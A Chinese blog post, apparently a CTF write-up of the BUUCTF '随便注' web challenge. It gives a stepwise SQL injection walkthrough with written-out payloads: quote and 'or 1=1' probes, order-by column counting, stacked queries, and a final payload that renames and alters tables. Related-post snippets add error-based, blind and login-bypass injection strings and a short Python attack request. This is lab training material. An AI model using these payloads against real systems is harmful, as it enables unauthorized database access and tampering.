BUUCTF【Web】随便注(SQL注入)

已于 2023-03-05 07:04:22 修改
阅读量506 收藏 2
点赞数 2
分类专栏: BUUCTF 文章标签: sql 网络安全
于 2023-03-02 19:58:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_70434663/article/details/129307409
版权

进入靶场后,发现框里面的“1”,我们点击查询后出现

e5d300f1b0b14e01afdd3f4294486643.png

猜测是SQL注入,我们随便输入1'(单引号为英文状态下输入)发现报错提示表明此为单引号的SQL注入。

8a307e3052e44bffbb3dbb3018fd6310.png

 第一步,测试注入点(利用引号,and 1=1 ,or 1=1之类的判断是字符型还是数字型)

常用的几种测试注入点:
1'
1'#
1' and 1=1#
1' or 1=1#

第二步,利用order by查表的列数

1' order by 1#        [不报错,正常回显]
1' order by 2#        [不报错,正常回显]
1' order by 3#        [error 1054 : Unknown column '3' in 'order clause']

 从1' order by 3#命令可以得知这张表有三列

第三步,如有回显,找到回显位

1' union select 1,2#

f812428f19cf4c8797faf957ea72c76e.png

 发现回显过滤了关键字。

不能找到回显位,通过分号注入多条SQL语句

  1. 通过show databases爆出数据库 
    1';show databases;#

    179b3f74aa094ec0a5db71f8705b39fb.png

  2.  

    通过show tables爆出表

     

    1' show tables;#

     ab53c028d90a4821b2cf5dfee9c55b4c.png

    发现有words和1919810931114514两张表

  3. 接下来,爆出两张表的内容 

1';show columns from words;#

 8d0ba2905d3045eaa87f5dfb020eb457.png

1';show columns from `1919810931114514`;#
注:表名为数字时,要用反引号包起来查询

f7a54a023834454ebada563039ab387a.png

 我们发现在1919810931114514表里面爆出了flag字段,猜测flag就在里面。

但是因为表过滤了select,所以使用rename先把words表改为其它的表名,在把1919810931114514表改为words表,给新的words表添加新的列名id,最后将flag改名为data

1'; rename table words to word1; rename table `1919810931114514` to words;alter table words add id int unsigned not Null auto_increment primary key; alter table words change flag data varchar(100);#

最后就会得到flag

88e154aa427a4b14b3258c583dfb201c.png

 

 

爱学习的葡萄萄
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf-web-[强网杯 2019]随便-wp
居上
06-22 1270
[强网杯 2019]随便 源码 (这题本身没有源码,源码是我从网上下载的便于学习) <html> <head> <meta charset="UTF-8"> <title>easy_sql</title> </head> <body> <h1>取材于某次真实环境渗透,只说一句话:开发和安全缺一不可</h1> <!-- sqlmap是没有灵魂的 --> <form
注入攻击(一)--------SQL注入(结合BUUCTF sqli-labs)
Young12138的博客
05-10 1793
为了准备信息安全技术课程汇报做的笔记,想着做了也是做了,不如分享出来给想我一样的初学者学习。本人之前没有做过CTF,也没有学过SQL注入,零基础,所以大佬可以先行离开。内容是SQL注入XPath注入HTML注入
BUUCTF Web [强网杯 2019]随便
热门推荐
wangyuxiang946的博客
10-25 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [强网杯 2019]随便一、题目简介二、思路分析1)判断注入点2)选择注入方式3)查看表中内容三、解题步骤1)获取表2)获取字段3)获取表中数据四、总结 一、题目简介 进入题目链接后,是一个「查询」功能,在输入框中提交id,即可返回「响应」的内容。 在输入框中输入一个2,即可.
BUUCTF关于sql注入的题目
最新发布
2302_80935968的博客
04-19 714
测试的时候输入了 1’ and ‘1’='1这个有问题的payload,看报错信息中带有一个 and password=‘1’ and ‘1’=1 说明sql语句是SELECT * FROM tables WHERE username=‘1’ and ‘1’=1 and password=‘1’ and ‘1’=1 类似这样的查询,and 的两边同时为TRUE 结果才能为 TRUE,所以输入的payload一定要符合这个条件就可以登录成功了。(select 输入数据 || flag from Flag)
BUUCTF&&SQL注入(部分)
huohaowen的博客
01-30 1273
今天不被靶场打,被ctf虐😓😓😓
BUUCTF-EasySQL(sql注入题目)
m0_74167420的博客
03-10 432
释符,因而传入后台的是 select * from table_name where username='1' or 1=1 (因为1=1恒为真,所以SQL语句返回真值,成功绕过验证得到flag),则可返回真值。4、在该题目中,如果不匹配数据库也能返回真值那么就能绕过验证登录(万能用户名)。一般的,库验证登录册查询数据会用到以下的句型,如果用户与密码匹配正确则返回。因为1=1恒为真,所以SQL语句返回真值,成功绕过验证得到flag。1、万能用户名/密码。2、在该题目中使用,
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 3948
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
Web安全之SQL注入攻击
03-04
①这个晨讲我构思了两个星期,但是之前电脑坏了,一直拖...今天由我给大家带来《web安全之SQL注入篇》系列晨讲,首先对课程进行简单介绍,SQL注入篇一共分为三讲:第一讲:“纸上谈兵:我们需要在本地架设注入环境,构
Web安全之SQL注入
01-21
SQL注入是指将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。当Web应用程序的开发人员对用户所输入的数据不进行过滤或验证(即存在注入点...
BUUCTF--N1BOOK
m0_59022585的博客
07-09 665
尝试注入'and updatexml(1,concat(0x7e,(seLect group_concat(table_name) from information_schema.tables where table_schema='note'),0x7e),1)#将select关键字绕过,成功回显出表(fl4g和users)。注入'and updatexml(1,concat(0x7e,(seLect group_concat(flag) from fl4g),0x7e),1)#回显出flag。
[强网杯 2019]随便
m0_56691564的博客
11-30 2621
该题作者在页面就查了这两个字段的内容,由于该题禁用select,因此我们可以用作者原本设定的查表函数来帮我们查我们想要查找的内容。用rename把words表改名为其他的表名,把 1919810931114514表的名字改为words,给words表添加新的列名id,将flag改名为data。大意应该是过滤了select,绕过一下,好的发现绕过不了,不管是编码还是释都不行,因此这个题使用堆叠注入。由show的作用可知,words表内就两个字段,一个叫id,一个叫data。
CTF-SQL注入
weixin_44770698的博客
06-16 4985
CTF-SQL注入题目整理
BuuCTF 极客大挑战SQL注入 WriteUP
她叫常玉莹
07-10 339
极客大挑战EasySQL极客大挑战 lovesql极客大挑战 babysql极客大挑战HardSQL极客大挑战FinalSQL 极客大挑战EasySQL 直接万能密码 1‘ or 1=1 #得到flag 极客大挑战 lovesql 报错注入获取数据库名 geek ' or extractvalue(1,concat('~',database())) # 获取表名 geekuser l0ve1ysql1 ' and extractvalue(1,concat(0x7e, (select group_c.
【学习笔记 43】 buu [BJDCTF 2nd]简单注入
weixin_43553654的博客
08-02 1081
0x00 知识点 \转义单引号 整型注入 二分法脚本 0x01 解题思路 打开网站一看, 再尝试在用户名和密码处尝试进行注入,发现‘,“都会报错,之后用御剑一扫,发现hint.txt文件。访问一下看看 提示说之后正确的用户和密码才能登上去,得到flag。之后给出了传参方式和mysql命令语句。 这时候很明显username处注入\来转义单引号,password处使用sql语句整数型注入。 举个例子: a. 传入admin\ 和 or/**/length(database())>0#会回显st
BUUCTF WEB 随便
guishengyx的博客
10-18 170
题目是注入,于是尝试SQL注入 order by 2得到两个字段 尝试联合查询时发现禁用了select 百度了解到堆叠查询 用;将语句隔开 发现可以使用堆叠注入 继续查询表名 查询表中的字段名 0';show columns from words;-- qwe 查询1919810931114514表的时候出现了问题 百度了解到数字表名需要用反引号``括起来 0';show columns from `1919810931114514`;-- asd ...
BUUCTFWEB-WarmUp
迷风小白
06-25 1万+
拿到题目,一个表情包,顺便扫一下目录
[SQL注入][强网杯 2019]随便(三种姿势)
Y4tacker的博客
08-05 8066
文章目录姿势一 ---- 常规堆叠注入姿势二---预处理语句姿势三 --- handeler参考文章 前言: 1919810931114514必须用反单引号括起来,但是words不需要,应该是和数据类型有关 姿势一 ---- 常规堆叠注入 堆叠注入为攻击者提供了很多控制权,与仅限于SELECT语句的UNION联合查询攻击不同,堆叠注入可以用于执行任何SQL语句。 首先老规矩输入1 加个单引号,报错 释掉后面大概猜到表的结构了selsect id,data from words where id =,并
BUUCTF[CISCN2019 华北赛区 Day2 Web1]Hack World(报错注入
qq_44657899的博客
03-12 2150
这道题过滤了常用的语句,还过滤了空格和/**/,一番分析之下发现果然我这种菜鸡只能看wp了。 然后学会了一种新的思路 0^(ascii(substr((select(flag)from(flag)),1,1))=ascii('f')) 脚本: import requests import time url='http://76eeac1c-8521-4f23-83f5-9e41b5f7b2d4.n...
BUUCTF [极客大挑战 2019] BabySQL
Senimo
03-25 3792
BUUCTF [极客大挑战 2019] BabySQL 启动靶机,打开环境: 尝试登陆: 因为前两次的题目BUUCTF 极客大挑战 2019 EasySQL和均用万能密码登陆成功,再次尝试: /check.php ?username=admin' or '1'='1 &password=1 登陆失败,尝试释掉password内容: /check.php ?username=adm...
buuctf web easy sql
12-18
根据提供的引用内容,buuctf web easy sql 是一个关于SQL注入的题目。根据引用[1],给出的SQL语句是一个拼接字符串的方式,其中包含了一个注入点。而引用中提到的sql_mode中的PIPES_AS_CONCAT选项将 || 视为字符串的连接操作符而非 "或" 运算符。 为了解决buuctf web easy sql这个题目,我们可以利用SQL注入的漏洞来绕过原本的查询逻辑,从而获取到flag。具体的方法是通过注入点构造恶意的输入,使得SQL语句执行时产生意外的结果。 以下是一个示例的SQL注入攻击代码: ```python import requests url = "http://example.com/login.php" # 替换为目标网站的登录页面URL payload = "' OR '1'='1' -- " # 构造的注入语句 data = { "username": payload, "password": "password" # 替换为正确的密码 } response = requests.post(url, data=data) print(response.text) # 输出响应内容,查看是否成功注入 ``` 请意,这只是一个示例,具体的注入点和注入语句需要根据实际情况进行调整。同时,进行SQL注入攻击是违法行为,请在合法授权的情况下进行相关测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值